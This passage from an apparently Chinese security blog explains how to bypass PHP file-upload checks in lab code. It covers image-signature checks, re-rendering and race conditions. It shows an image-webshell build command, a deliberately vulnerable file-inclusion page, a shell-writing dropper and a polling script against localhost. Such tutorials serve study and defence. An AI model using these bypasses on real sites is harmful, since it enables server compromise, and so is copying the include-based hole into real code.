class="line"> $info = getimagesize($filename);</span><br><span class="line"> $ext = image_type_to_extension($info[2]);</span><br><span class="line"> if(stripos($types,$ext)>=0){</span><br><span class="line"> return $ext;</span><br><span class="line"> }else{</span><br><span class="line"> return false;</span><br><span class="line"> }</span><br><span class="line"> }else{</span><br><span class="line"> return false;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = false;</span><br><span class="line">$msg = null;</span><br><span class="line">if(isset($_POST['submit'])){</span><br><span class="line"> $temp_file = 
$_FILES['upload_file']['tmp_name'];</span><br><span class="line"> $res = isImage($temp_file);</span><br><span class="line"> if(!$res){</span><br><span class="line"> $msg = "文件未知,上传失败!";</span><br><span class="line"> }else{</span><br><span class="line"> $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;</span><br><span class="line"> if(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = true;</span><br><span class="line"> } else {</span><br><span class="line"> $msg = "上传出错!";</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>准备一张普通的图片和一句话木马</p>
<p>在命令控制行输入以下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy image.jpg/b+test.php/a test.png</span><br></pre></td></tr></table></figure>
<p>生成的test.png就是我们制作好的图片马,上传即可</p>
<p>利用文件包含执行php代码</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure>
<h4 id="突破exif-imagetype"><a href="#突破exif-imagetype" class="headerlink" title="突破exif_imagetype()"></a>突破exif_imagetype()</h4><p>通过exif模块读取文件开头的图片签名来检测文件类型</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span>(<span class="params"><span class="variable">$filename</span></span>)</span>{</span><br><span class="line"> <span class="comment">//需要开启php_exif模块</span></span><br><span class="line"> <span class="variable">$image_type</span> = exif_imagetype(<span class="variable">$filename</span>);</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$image_type</span>) {</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_GIF:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"gif"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> 
<span class="keyword">case</span> IMAGETYPE_JPEG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"jpg"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_PNG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"png"</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$res</span> = isImage(<span class="variable">$temp_file</span>);</span><br><span class="line"> <span class="keyword">if</span>(!<span class="variable">$res</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span 
class="string">"."</span>.<span class="variable">$res</span>;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)){</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>准备一张普通的图片和一句话木马</p>
<p>在命令控制行输入以下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy image.jpg/b+test.php/a test.png</span><br></pre></td></tr></table></figure>
<p>生成的test.png就是我们制作好的图片马,上传即可</p>
<p>利用文件包含执行php代码</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure>
<h4 id="二次渲染"><a href="#二次渲染" class="headerlink" title="二次渲染"></a>二次渲染</h4><p>这里综合判断了后缀名、content-type,并利用<code>imagecreatefromjpeg</code>/<code>imagecreatefrompng</code>/<code>imagecreatefromgif</code></p>
<p>判断是否为图片,最后再做了一次二次渲染</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="comment">// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径</span></span><br><span class="line"> <span class="variable">$filename</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$filetype</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>];</span><br><span class="line"> <span class="variable">$tmpname</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"></span><br><span class="line"> <span class="variable">$target_path</span>=UPLOAD_PATH.<span class="string">'/'</span>.basename(<span 
class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 获得上传文件的扩展名</span></span><br><span class="line"> <span class="variable">$fileext</span>= substr(strrchr(<span class="variable">$filename</span>,<span class="string">"."</span>),<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">//判断文件后缀与类型,合法才进行上传操作</span></span><br><span class="line"> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"jpg"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/jpeg"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> <span class="variable">$im</span> = imagecreatefromjpeg(<span class="variable">$target_path</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是jpg格式的图片!"</span>;</span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> srand(time());</span><br><span class="line"> <span class="variable">$newfilename</span> = strval(rand()).<span class="string">".jpg"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> 
imagejpeg(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"png"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/png"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> <span class="variable">$im</span> = imagecreatefrompng(<span class="variable">$target_path</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是png格式的图片!"</span>;</span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> srand(time());</span><br><span class="line"> <span class="variable">$newfilename</span> = strval(rand()).<span class="string">".png"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> <span 
class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> imagepng(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"></span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>; </span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">"gif"</span>) && (<span class="variable">$filetype</span>==<span class="string">"image/gif"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> <span class="variable">$im</span> = imagecreatefromgif(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"该文件不是gif格式的图片!"</span>;</span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> srand(time());</span><br><span class="line"> <span class="variable">$newfilename</span> = strval(rand()).<span 
class="string">".gif"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">'/'</span>.<span class="variable">$newfilename</span>;</span><br><span class="line"> imagegif(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line"></span><br><span class="line"> @unlink(<span class="variable">$target_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传后缀为.jpg|.png|.gif的图片文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>准备一张图片,上传,再把上传之后的图片再次上传</p>
<p>通过工具对比三张图片的十六进制内容,可以确定这里是通过文件头部信息、文件扩展名和<code>content-type</code>三者对文件类型进行检测</p>
<p>如果该文件符合规则,则通过<code>imagecreatefrompng</code>等函数对文件内容进行二次渲染,再以新的文件名保存</p>
<p>我们通过对比三张图片,可以确定不被渲染的文件头部分和被渲染的主体部分</p>
<p>我们把一句话代码插入到文件头中,这样就不会被渲染掉</p>
<p>这里注意插入代码的位置,如果插入点正好是检测文件类型的那一部分,会导致判断不出文件类型,从而拦截</p>
<p>所以插入点位置尽量靠后,并且在冒号之后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">比如代码插入到了xxx(代码):xxx</span><br><span class="line">可能会被检测到文件类型异常</span><br><span class="line">需要手动修改为xxx:(代码)xxx</span><br></pre></td></tr></table></figure>
<p>利用文件包含执行php代码</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure>
<h3 id="代码逻辑"><a href="#代码逻辑" class="headerlink" title="代码逻辑"></a>代码逻辑</h3><h4 id="条件竞争"><a href="#条件竞争" class="headerlink" title="条件竞争"></a>条件竞争</h4><p>条件竞争上传是一种服务器端的漏洞,由后端程序操作逻辑不合理导致。<br>由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计得不合理,将会导致此类问题的发生,此漏洞一般发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。</p>
<div class="tabs" id=""><ul class="nav-tabs"><li class="tab active"><button type="button" data-href="#-1">直接保存</button></li><li class="tab"><button type="button" data-href="#-2">白名单检测</button></li></ul><div class="tab-contents"><div class="tab-item-content active" id="-1"><p>文件先通过move_uploaded_file进行保存,然后用in_array判断文件是否为图片类型,如果是就用rename进行重命名,如果不是,则使用unlink删除文件。这里的校验发生在文件落盘之后,从保存到删除之间的这段时间就是竞争窗口;正确的做法是在写入 web 可访问目录之前完成校验,或先保存到 web 无法直接访问的临时目录。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$file_ext</span> = substr(<span class="variable">$file_name</span>,strrpos(<span class="variable">$file_name</span>,<span 
class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="variable">$upload_file</span> = UPLOAD_PATH . <span class="string">'/'</span> . <span class="variable">$file_name</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$temp_file</span>, <span class="variable">$upload_file</span>)){</span><br><span class="line"> <span class="keyword">if</span>(in_array(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>)){</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span>. rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"> rename(<span class="variable">$upload_file</span>, <span class="variable">$img_path</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> unlink(<span class="variable">$upload_file</span>);</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>首先上传一个php文件,当然这个文件会被立马删掉,所以我们使用burp suite不断地进行上传操作,总会有一次在上传文件到删除文件这个时间段内访问到上传的php文件,一旦我们成功访问到了上传的文件,那么它就会向服务器写一个shell。</p>
<p>先上传一个正常的图片,判断文件上传的地址</p>
<p>创建一个php文件,写入如下代码,该代码会生成一个包含恶意代码的php文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">fputs(fopen(<span class="string">'shell.php'</span>,w),<span class="string">'<?php phpinfo();?>'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>一边通过burp suite不断进行上传操作,一边不断访问文件上传的地址;由于条件竞争,文件可能在上传之后还没来得及改名</p>
<p>这里可以通过python脚本不断进行访问(也可以手动访问)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line"> req = requests.get(<span class="string">"文件上传地址"</span>)</span><br><span class="line"> <span class="keyword">if</span> req.status_code==<span class="number">200</span>:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"访问成功,"</span>+<span class="string">"响应码:"</span>+<span class="built_in">str</span>(req.status_code))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"test~"</span>)</span><br></pre></td></tr></table></figure>
<p>成功的时候,<code>shell.php</code>文件已经被写入,直接访问即可</p>
<p>如果存在文件包含,可以直接上传图片马,再进行文件包含</p>
<p>利用文件包含执行php代码</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div><div class="tab-item-content" id="-2"><p>这里先进行白名单判断,拒绝不在白名单里文件的上传操作,然后会一步一步检查文件大小、文件是否存在等等,将文件上传后,对文件重新命名。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//index.php</span></span><br><span class="line"><span 
